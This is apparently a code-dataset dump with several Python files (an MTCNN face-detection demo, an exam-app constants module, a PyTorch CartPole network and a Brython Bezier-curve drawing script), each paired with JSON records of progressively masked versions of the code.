# model checkpoint locations
model_path = ['model/PNet/', 'model/RNet/', 'model/ONet']
batch_size = config.batches
detectors[0] = FcnDetector(P_Net, model_path[0])  # detector for PNet
if test_mode in ['RNet', 'ONet']:
detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])
if test_mode == 'ONet':
detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])
# Use the three detectors to construct the cascaded MTCNN detector (PNet -> RNet -> ONet)
mtcnn_detector = MtcnnDetector(
detectors=detectors,
min_face_size=min_face_size,
stride=stride,
threshold=thresh,
scale_factor=scale_factor)
out_path = join('validate', test_mode) + '/'
if config.input_mode == '1':
    # image mode: run detection on every file in the test directory
path = config.test_dir
print(path)
for item in tqdm(os.listdir(path)):
img_path = os.path.join(path, item)
img = cv2.imread(img_path)
img_labeled = mtcnn_detector.detect_and_draw(img)
cv2.imwrite(out_path + item, img_labeled)
# webcam mode: capture from the camera, detect faces per frame, and record
# the annotated stream to a video file
if config.input_mode == '2':
cap = cv2.VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))
while True:
t1 = cv2.getTickCount()
ret, frame = cap.read()
        if ret:
boxes_c, landmarks = mtcnn_detector.detect(frame)
t2 = cv2.getTickCount()
t = (t2-t1)/cv2.getTickFrequency()
fps = 1.0/t
for i in range(boxes_c.shape[0]):
bbox = boxes_c[i, :4]
score = boxes_c[i, 4]
corpbbox = [int(bbox[0]), int(bbox[1]),
int(bbox[2]), int(bbox[3])]
                # draw the face bounding box
cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),
(corpbbox[2], corpbbox[3]), (255, 0, 0), 1)
                # draw the detection confidence
cv2.putText(frame, '{:.2f}'.format(score),
(corpbbox[0], corpbbox[1] - 2),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 255), 2)
            # draw elapsed time and fps
cv2.putText(frame, '{:.4f}'.format(t) + " " + '{:.3f}'.format(fps), (10, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)
            # draw the facial landmarks
for i in range(landmarks.shape[0]):
for j in range(len(landmarks[i])//2):
                    cv2.circle(
                        frame, (int(landmarks[i][2*j]), int(landmarks[i][2*j+1])), 2, (0, 0, 255))
            out.write(frame)
cv2.imshow("result", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
out.release()
cv2.destroyAllWindows()
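
# A minimal single-image sketch (illustrative; the only contract assumed is
# the one the video loop above already relies on: detect() returns boxes_c of
# shape (N, 5) as [x1, y1, x2, y2, score] and landmarks as flattened (x, y)
# pairs per face). Kept commented out so the script's behavior is unchanged.
#
# img = cv2.imread('example.jpg')  # hypothetical input path
# boxes_c, landmarks = mtcnn_detector.detect(img)
# for x1, y1, x2, y2, score in boxes_c:
#     cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 1)
# cv2.imwrite('example_labeled.jpg', img)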
|
normal
|
{
"blob_id": "f97a892e6e0aa258ad917c4a73a66e89b0dc3253",
"index": 267,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n<mask token>\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-3": "<mask token>\nsys.path.extend(['detection', 'train'])\n<mask token>\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-4": "import sys\nsys.path.extend(['detection', 'train'])\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\nscale_factor = 0.79\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\ndetectors[0] = FcnDetector(P_Net, model_path[0])\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\nmtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=\n min_face_size, stride=stride, threshold=thresh, scale_factor=scale_factor)\nout_path = join('validate', test_mode) + '/'\nif config.input_mode == '1':\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n cv2.imwrite(out_path + item, img_labeled)\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path + 'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2 - t1) / cv2.getTickFrequency()\n fps = 1.0 / t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]), int(bbox[2]), int(\n bbox[3])]\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]), (corpbbox[\n 2], corpbbox[3]), (255, 0, 0), 1)\n cv2.putText(frame, '{:.2f}'.format(score), (corpbbox[0], \n corpbbox[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0,\n 255), 2)\n cv2.putText(frame, '{:.4f}'.format(t) + ' ' + '{:.3f}'.format(\n fps), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2\n )\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i]) // 2):\n cv2.circle(frame, (int(landmarks[i][2 * j]), int(int(\n landmarks[i][2 * j + 1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow('result', frame)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-5": "\n# coding: utf-8\n\n# In[1]:\nimport sys\nsys.path.extend(['detection', 'train'])\n\n# from detection folder\nfrom MtcnnDetector import MtcnnDetector\nfrom detector import Detector\nfrom fcn_detector import FcnDetector\n\n# from train folder\nfrom model_factory import P_Net, R_Net, O_Net\nimport config as config\nfrom preprocess.utils import iou\n\nimport cv2\nimport os\nfrom os.path import join, split\nimport numpy as np\nfrom tqdm import tqdm\n\n# In[ ]:\n# test_mode = config.test_mode\ntest_mode = 'ONet'\nthresh = [0.6, 0.7, 0.9]\nmin_face_size = 24\nstride = 2\ndetectors = [None, None, None]\n\nscale_factor = 0.79\n\n# 模型放置位置\nmodel_path = ['model/PNet/', 'model/RNet/', 'model/ONet']\nbatch_size = config.batches\n\ndetectors[0] = FcnDetector(P_Net, model_path[0]) # detecotors for PNet\nif test_mode in ['RNet', 'ONet']:\n detectors[1] = Detector(R_Net, 24, batch_size[1], model_path[1])\n\n if test_mode == 'ONet':\n detectors[2] = Detector(O_Net, 48, batch_size[2], model_path[2])\n\n# Use the three detectors to construct a \nmtcnn_detector = MtcnnDetector(\n detectors=detectors,\n min_face_size=min_face_size,\n stride=stride,\n threshold=thresh,\n scale_factor=scale_factor)\n\n\nout_path = join('validate', test_mode) + '/'\n\nif config.input_mode == '1':\n #选用图片\n path = config.test_dir\n print(path)\n for item in tqdm(os.listdir(path)):\n img_path = os.path.join(path, item)\n img = cv2.imread(img_path)\n img_labeled = mtcnn_detector.detect_and_draw(img)\n\n cv2.imwrite(out_path + item, img_labeled)\n\nif config.input_mode == '2':\n cap = cv2.VideoCapture(0)\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter(out_path+'out.mp4', fourcc, 10, (640, 480))\n while True:\n t1 = cv2.getTickCount()\n ret, frame = cap.read()\n if ret == True:\n boxes_c, landmarks = mtcnn_detector.detect(frame)\n t2 = cv2.getTickCount()\n t = (t2-t1)/cv2.getTickFrequency()\n fps = 1.0/t\n for i in range(boxes_c.shape[0]):\n bbox = boxes_c[i, :4]\n score = boxes_c[i, 4]\n corpbbox = [int(bbox[0]), int(bbox[1]),\n int(bbox[2]), int(bbox[3])]\n\n #画人脸框\n cv2.rectangle(frame, (corpbbox[0], corpbbox[1]),\n (corpbbox[2], corpbbox[3]), (255, 0, 0), 1)\n #画置信度\n cv2.putText(frame, '{:.2f}'.format(score),\n (corpbbox[0], corpbbox[1] - 2),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5, (0, 0, 255), 2)\n #画fps值\n cv2.putText(frame, '{:.4f}'.format(t) + \" \" + '{:.3f}'.format(fps), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 255), 2)\n #画关键点\n for i in range(landmarks.shape[0]):\n for j in range(len(landmarks[i])//2):\n cv2.circle(\n frame, (int(landmarks[i][2*j]), int(int(landmarks[i][2*j+1]))), 2, (0, 0, 255))\n a = out.write(frame)\n cv2.imshow(\"result\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n out.release()\n cv2.destroyAllWindows()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# !/usr/bin/env python
# coding: utf-8
__author__ = 'zhouhenglc'
TIME_FORMAT = '%Y-%m-%d %H:%M:%S'
ENCODING = 'utf-8'
# exam mode
# G_SELECT_MODE is deprecated; gradually migrate to classes.objects.question_type
# G_SELECT_MODE = ["none", "single choice", "term definition", "short answer",
#                  "calculation", "essay", "multiple choice", "true/false"]
G_MULTI_MODE = [6, ]  # multi-select question types (multiple choice = 6)
# G_DEF_OPTIONS = [1, 6]  # custom options: single choice = 1, multiple choice = 6
# exam status
STATUS_ONLINE = 64
STATUS_OFFLINE = 128
# token error
TOKEN_BAD_FORMAT = 'token_bad_format' # login again
TOKEN_EXPIRED = 'token_expired' # try refresh
TOKEN_NOT_STORAGE = 'token_not_storage' # login again
TOKEN_REQUIRE_REFRESH = 'token_require_refresh' # try refresh
# training question state
T_STATE_RIGHT = 'right'
T_STATE_WRONG = 'wrong'
T_STATE_SKIP = 'skip'
T_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]
# resource constants
R_EXAM = 'exam'
R_QUESTION = 'question'
R_VC = 'virtual_currency'
R_SE = 'security'
# resource event
E_AFTER_UPDATE = 'after_update'
E_GEN_TOKEN = 'gen_token'
E_PARSING_TOKEN = 'parsing_token'
E_NEW_BILLING = 'new_billing'
E_SE_FIREWALL = 'security_firewall'
# vc billing
VB_FB = 'feedback_exam'
VB_FB_NAME = '题库问题反馈得积分'  # "earn points for question-bank feedback"
VC_EC_EM = 'vc_exchange_exam_mem'
VC_EC_EM_NAME = '积分换题库会员'  # "exchange points for question-bank membership"
# security handle action
SE_ACTION_NORMAL = 'normal'
SE_ACTION_WARN = 'warn'
SE_ACTION_EXIT = 'exit'
# DATA_REGISTRY keys
DR_KEY_VC_GOODS = 'vc_goods'
DR_KEY_ROUTES = 'routes'
# goods type
GOOD_TYPE_EXAM = 'exam'
|
normal
|
{
"blob_id": "4605a3f88c73b43fa7611a10a400ad2d4d7c6dfc",
"index": 2273,
"step-1": "<mask token>\n",
"step-2": "__author__ = 'zhouhenglc'\nTIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nENCODING = 'utf-8'\nG_MULTI_MODE = [6]\nSTATUS_ONLINE = 64\nSTATUS_OFFLINE = 128\nTOKEN_BAD_FORMAT = 'token_bad_format'\nTOKEN_EXPIRED = 'token_expired'\nTOKEN_NOT_STORAGE = 'token_not_storage'\nTOKEN_REQUIRE_REFRESH = 'token_require_refresh'\nT_STATE_RIGHT = 'right'\nT_STATE_WRONG = 'wrong'\nT_STATE_SKIP = 'skip'\nT_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]\nR_EXAM = 'exam'\nR_QUESTION = 'question'\nR_VC = 'virtual_currency'\nR_SE = 'security'\nE_AFTER_UPDATE = 'after_update'\nE_GEN_TOKEN = 'gen_token'\nE_PARSING_TOKEN = 'parsing_token'\nE_NEW_BILLING = 'new_billing'\nE_SE_FIREWALL = 'security_firewall'\nVB_FB = 'feedback_exam'\nVB_FB_NAME = '题库问题反馈得积分'\nVC_EC_EM = 'vc_exchange_exam_mem'\nVC_EC_EM_NAME = '积分换题库会员'\nSE_ACTION_NORMAL = 'normal'\nSE_ACTION_WARN = 'warn'\nSE_ACTION_EXIT = 'exit'\nDR_KEY_VC_GOODS = 'vc_goods'\nDR_KEY_ROUTES = 'routes'\nGOOD_TYPE_EXAM = 'exam'\n",
"step-3": "# !/usr/bin/env python\n# coding: utf-8\n\n\n__author__ = 'zhouhenglc'\n\n\nTIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nENCODING = 'utf-8'\n\n\n# exam mode\n# G_SELECT_MODE\n# 待废弃,逐步完善使用classes.objects.question_type\n# G_SELECT_MODE = [\"无\", \"选择题\", \"名词解释\", \"简答题\", \"计算题\", \"论述题\", \"多选题\", \"判断题\"]\nG_MULTI_MODE = [6, ] # 多选题型 多选题=6\n# G_DEF_OPTIONS = [1, 6] # 自定义选项 单选题=1 多选题=6\n\n# exam status\nSTATUS_ONLINE = 64\nSTATUS_OFFLINE = 128\n\n# token error\nTOKEN_BAD_FORMAT = 'token_bad_format' # login again\nTOKEN_EXPIRED = 'token_expired' # try refresh\nTOKEN_NOT_STORAGE = 'token_not_storage' # login again\nTOKEN_REQUIRE_REFRESH = 'token_require_refresh' # try refresh\n\n\n# training question state\nT_STATE_RIGHT = 'right'\nT_STATE_WRONG = 'wrong'\nT_STATE_SKIP = 'skip'\nT_STATES = [T_STATE_RIGHT, T_STATE_WRONG, T_STATE_SKIP]\n\n\n# resource constants\nR_EXAM = 'exam'\nR_QUESTION = 'question'\nR_VC = 'virtual_currency'\nR_SE = 'security'\n\n\n# resource event\nE_AFTER_UPDATE = 'after_update'\nE_GEN_TOKEN = 'gen_token'\nE_PARSING_TOKEN = 'parsing_token'\nE_NEW_BILLING = 'new_billing'\nE_SE_FIREWALL = 'security_firewall'\n\n\n# vc billing\nVB_FB = 'feedback_exam'\nVB_FB_NAME = '题库问题反馈得积分'\nVC_EC_EM = 'vc_exchange_exam_mem'\nVC_EC_EM_NAME = '积分换题库会员'\n\n\n# security handle action\nSE_ACTION_NORMAL = 'normal'\nSE_ACTION_WARN = 'warn'\nSE_ACTION_EXIT = 'exit'\n\n\n# DATA_REGISTRY keys\nDR_KEY_VC_GOODS = 'vc_goods'\nDR_KEY_ROUTES = 'routes'\n\n\n# goods type\nGOOD_TYPE_EXAM = 'exam'\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
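A minimal sketch of how the token-error constants above might be consumed by a client, following the inline hints ("try refresh" vs. "login again"); the handle_token_error helper is hypothetical and named here only for illustration:

def handle_token_error(error):
    # TOKEN_EXPIRED and TOKEN_REQUIRE_REFRESH are annotated "try refresh";
    # TOKEN_BAD_FORMAT and TOKEN_NOT_STORAGE require a fresh login.
    if error in (TOKEN_EXPIRED, TOKEN_REQUIRE_REFRESH):
        return 'refresh'
    if error in (TOKEN_BAD_FORMAT, TOKEN_NOT_STORAGE):
        return 'login'
    return 'ok'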
# Neural network model(s) for the pygym 'CartPoleEnv'
#
# author: John Welsh
import torch.nn as nn
import torch.nn.functional as F
class CartPoleModel(nn.Module):
def __init__(self):
super(CartPoleModel, self).__init__()
self.fc1 = nn.Linear(4, 60)
self.fc2 = nn.Linear(60, 120)
self.fc3 = nn.Linear(120, 2)
def forward(self, x):
x = F.tanh(self.fc1(x))
x = F.tanh(self.fc2(x))
x = self.fc3(x)
return x
|
normal
|
{
"blob_id": "bde3975f5b614a4b00ad392d9f0b4c1bd8c55dc0",
"index": 6855,
"step-1": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-4": "import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-5": "# Neural network model(s) for the pygym 'CartPoleEnv'\n#\n# author: John Welsh\n\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass CartPoleModel(nn.Module):\n\n def __init__(self):\n super(CartPoleModel, self).__init__()\n self.fc1 = nn.Linear(4, 60)\n self.fc2 = nn.Linear(60, 120)\n self.fc3 = nn.Linear(120, 2)\n\n def forward(self, x):\n x = F.tanh(self.fc1(x))\n x = F.tanh(self.fc2(x))\n x = self.fc3(x)\n return x\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
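A minimal usage sketch for the CartPoleModel above, assuming only that PyTorch is installed; note that F.tanh is deprecated in recent PyTorch releases in favor of the numerically identical torch.tanh:

import torch

model = CartPoleModel()
state = torch.randn(1, 4)        # one 4-dimensional CartPole observation
scores = model(state)            # shape (1, 2): one score per action
action = scores.argmax(dim=1)    # greedy action selection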
from javascript import JSConstructor
from javascript import JSObject
cango = JSConstructor(Cango2D)
shapes2d = JSObject(shapes2D)
tweener = JSConstructor(Tweener)
drag2d = JSConstructor(Drag2D)
svgtocgo2d = JSConstructor(svgToCgo2D)
cgo = cango("plotarea")
x1, y1 = 40, 20
cx1, cy1 = 90, 120
x2, y2 = 120, 100
cx2, cy2 = 130, 20
cx3, cy3 = 150, 120
x3, y3 = 180, 60
#called in scope of dragNdrop obj
def dragC1(mousePos):
global cx1, cy1
cx1 = mousePos.x
cy1 = mousePos.y
drawCurve()
def dragC2(mousePos):
global cx2, cy2
cx2 = mousePos.x
cy2 = mousePos.y
drawCurve()
def dragC3(mousePos):
global cx3, cy3
cx3 = mousePos.x
cy3 = mousePos.y
drawCurve()
def drawCurve():
    # the curve changes shape, so it must be re-compiled each time
    # draw a quadratic bezier from x1,y1 to x2,y2
qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]
qbez = cgo.compilePath(qbezdata, 'blue')
cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]
cbez = cgo.compilePath(cbezdata, 'green')
# show lines to control point
data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]
# semi-transparent gray
L1 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x2, y2, 'L', cx2, cy2]
L2 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x3, y3, 'L', cx3, cy3]
L3 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
# draw draggable control points
c1.transform.reset()
c1.transform.translate(cx1, cy1)
c2.transform.reset()
c2.transform.translate(cx2, cy2)
c3.transform.reset()
c3.transform.translate(cx3, cy3)
grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)
cgo.renderFrame(grp)
cgo.clearCanvas("lightyellow")
cgo.setWorldCoords(0, 0, 200)
# pre-compile the draggable control point
dragObj1 = drag2d(cgo, None, dragC1, None)  # None, not the undefined JS-style null, in Python source
c1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c1.enableDrag(dragObj1)
dragObj2 = drag2d(cgo, None, dragC2, None)
c2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c2.enableDrag(dragObj2)
dragObj3 = drag2d(cgo, None, dragC3, None)
c3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c3.enableDrag(dragObj3)
drawCurve()
|
normal
|
{
"blob_id": "3b19ee0bbd24b76dd8b933859f6a56c459926861",
"index": 5615,
"step-1": "<mask token>\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 0, 200)\n<mask token>\nc1.enableDrag(dragObj1)\n<mask token>\nc2.enableDrag(dragObj2)\n<mask token>\nc3.enableDrag(dragObj3)\ndrawCurve()\n",
"step-3": "<mask token>\ncango = JSConstructor(Cango2D)\nshapes2d = JSObject(shapes2D)\ntweener = JSConstructor(Tweener)\ndrag2d = JSConstructor(Drag2D)\nsvgtocgo2d = JSConstructor(svgToCgo2D)\ncgo = cango('plotarea')\nx1, y1 = 40, 20\ncx1, cy1 = 90, 120\nx2, y2 = 120, 100\ncx2, cy2 = 130, 20\ncx3, cy3 = 150, 120\nx3, y3 = 180, 60\n\n\ndef dragC1(mousePos):\n global cx1, cy1\n cx1 = mousePos.x\n cy1 = mousePos.y\n drawCurve()\n\n\ndef dragC2(mousePos):\n global cx2, cy2\n cx2 = mousePos.x\n cy2 = mousePos.y\n drawCurve()\n\n\ndef dragC3(mousePos):\n global cx3, cy3\n cx3 = mousePos.x\n cy3 = mousePos.y\n drawCurve()\n\n\ndef drawCurve():\n qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]\n qbez = cgo.compilePath(qbezdata, 'blue')\n cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]\n cbez = cgo.compilePath(cbezdata, 'green')\n data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]\n L1 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x2, y2, 'L', cx2, cy2]\n L2 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n data = ['M', x3, y3, 'L', cx3, cy3]\n L3 = cgo.compilePath(data, 'rgba(0, 0, 0, 0.2)')\n c1.transform.reset()\n c1.transform.translate(cx1, cy1)\n c2.transform.reset()\n c2.transform.translate(cx2, cy2)\n c3.transform.reset()\n c3.transform.translate(cx3, cy3)\n grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)\n cgo.renderFrame(grp)\n\n\ncgo.clearCanvas('lightyellow')\ncgo.setWorldCoords(0, 